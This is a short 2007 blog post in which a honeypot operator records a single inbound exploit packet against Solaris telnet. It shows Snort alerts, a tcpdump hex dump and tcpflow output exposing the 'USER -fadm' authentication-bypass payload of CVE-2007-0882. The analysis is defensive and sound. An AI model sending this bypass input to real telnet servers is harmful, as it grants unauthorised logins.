Thursday, March 01, 2007

Don't Use Telnet!


Today I got my first hit of the Solaris exploit (Worm?) on my honeypot. Both my Bleeding rules and my normal Snort registered rules fired on this single inbound packet.

# less alert | grep -A 4 -B 2 192.18.17.206
[**] [1:2003411:5] BLEEDING-EDGE EXPLOIT Solaris telnet USER environment vuln Attack inbound [**]
[Classification: Attempted User Privilege Gain] [Priority: 1]
03/01-13:44:29.556771 192.18.17.206:1134 -> 192.168.0.34:23
TCP TTL:46 TOS:0x0 ID:52835 IpLen:20 DgmLen:86 DF
***AP*** Seq: 0xED89493C Ack: 0x9D57147C Win: 0xC4E0 TcpLen: 20
[Xref => http://isc.sans.org/diary.html?n&storyid=2220][Xref => http://riosec.com/solaris-telnet-0-day]

[**] [1:10136:3] TELNET Solaris login environment variable authentication bypass attempt [**]
[Classification: Attempted Administrator Privilege Gain] [Priority: 1]
03/01-13:44:29.556771 192.18.17.206:1134 -> 192.168.0.34:23
TCP TTL:46 TOS:0x0 ID:52835 IpLen:20 DgmLen:86 DF
***AP*** Seq: 0xED89493C Ack: 0x9D57147C Win: 0xC4E0 TcpLen: 20
[Xref => http://www.securityfocus.com/bid/22512]

The below packet is the culprit:


# tcpdump -vvnnXs 1514 -r ../snort/snort.log.1172706692 port 23 | less
reading from file ../snort/snort.log.1172706692, link-type EN10MB (Ethernet)
13:44:29.556771 IP (tos 0x0, ttl 46, id 52835, offset 0, flags [DF], proto: TCP (6), length: 86) 192.18.17.206.1134 > 192.168.0.34.23: P, cksum 0x0fed (correct), 3985197372
:3985197418(46) ack 2639729788 win 50400 [telnet WILL NAWS, SB NAWS IS 0x50 0 0x19 SE, WILL TERMINAL TYPE, SB TERMINAL TYPE IS 0x76 0x74 0x31 0x30 0x30 SE, WILL NEW-ENVIRON,
SB NEW-ENVIRON IS 0 0x55 0x53 0x45 0x52 0x1 0x2d 0x66 0x61 0x64 0x6d SE]
0x0000: 4500 0056 ce63 4000 2e06 eb93 c012 11ce E..V.c@.........
0x0010: c0a8 0022 046e 0017 ed89 493c 9d57 147c ...".n....I<.W.| 0x0020: 5018 c4e0 0fed 0000 fffb 1fff fa1f 0050 P..............P 0x0030: 0019 fff0 fffb 18ff fa18 0076 7431 3030 ...........vt100 0x0040: fff0 fffb 27ff fa27 0000 5553 4552 012d ....'..'..
USER.-
0x0050: 6661 646d fff0
fadm..

And flow data:

# tcpflow -cr honeytrap_00023_20070301125318 port 23
192.018.017.206.01134-192.168.000.034.00023: ...
192.018.017.206.01134-192.168.000.034.00023: .......P...........vt100....'..'..USER.-fadm..
192.168.000.034.00023-192.018.017.206.01134:

192.168.000.034.00023-192.018.017.206.01134:

It is quite easy to see the -f and the login "adm". This is consistent with MITRE's description:

"The telnet daemon (in.telnetd) in Solaris 10 and 11 (SunOS 5.10 and 5.11) misinterprets certain client "-f" sequences as valid requests for the login program to skip authentication, which allows remote attackers to log into certain accounts"

Ref: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0882